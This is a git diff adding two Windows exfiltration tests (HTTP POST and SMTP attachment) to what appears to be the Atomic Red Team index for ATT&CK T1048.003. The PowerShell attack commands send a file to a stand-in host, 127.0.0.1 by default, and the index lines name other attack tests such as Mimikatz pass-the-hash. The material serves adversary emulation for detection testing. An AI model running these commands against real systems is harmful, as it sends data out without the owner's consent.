diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index a0454d4d..c1f6cbc1 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -785,6 +785,8 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index cc6a88a4..c1bcace7 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -550,6 +550,8 @@ execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index dac4c811..9fe88826 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1478,6 +1478,8 @@
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
+ - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
+ - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 817d3cce..25ff7cac 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1023,6 +1023,8 @@
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
+ - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
+ - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b7bb122c..044e72a5 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -60763,6 +60763,57 @@ exfiltration:
output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
| sort | uniq | xxd -p -r\n"
name: manual
+ - name: Exfiltration Over Alternative Protocol - HTTP
+ auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
+ description: |
+ Exfiltration of specified file over HTTP.
+ Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $content = Get-Content #{input_file}
+ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
+ name: powershell
+ input_arguments:
+ input_file:
+ description: Path to file to exfiltrate
+ type: Path
+ default: C:\Windows\System32\notepad.exe
+ ip_address:
+ description: Destination IP address where the data should be sent
+ type: String
+ default: http://127.0.0.1
+ - name: Exfiltration Over Alternative Protocol - SMTP
+ auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
+ description: |
+ Exfiltration of specified file over SMTP.
+ Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+ supported_platforms:
+ - windows
+ executor:
+ command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003
+ Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
+
+'
+ name: powershell
+ input_arguments:
+ input_file:
+ description: Path to file to exfiltrate
+ type: Path
+ default: C:\Windows\System32\notepad.exe
+ sender:
+ description: The email address of the sender
+ type: String
+ default: test@corp.com
+ receiver:
+ description: The email address of the receiver
+ type: String
+ default: test@corp.com
+ smtp_server:
+ description: SMTP server to use for email transportation
+ type: String
+ default: 127.0.0.1
T1567:
technique:
external_references:
diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md
index 24e8c2e9..7a658ca8 100644
--- a/atomics/T1048.003/T1048.003.md
+++ b/atomics/T1048.003/T1048.003.md
@@ -12,6 +12,10 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
- [Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-3---exfiltration-over-alternative-protocol---dns)
+- [Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-4---exfiltration-over-alternative-protocol---http)
+
+- [Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP](#atomic-test-5---exfiltration-over-alternative-protocol---smtp)
+
@@ -108,4 +112,69 @@ Exfiltration of specified file over DNS protocol.
+
+
+
+## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
+Exfiltration of specified file over HTTP.
+Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe|
+| ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$content = Get-Content #{input_file}
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
+Exfiltration of specified file over SMTP.
+Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe|
+| sender | The email address of the sender | String | test@corp.com|
+| receiver | The email address of the receiver | String | test@corp.com|
+| smtp_server | SMTP server to use for email transportation | String | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
+```
+
+
+
+
+
+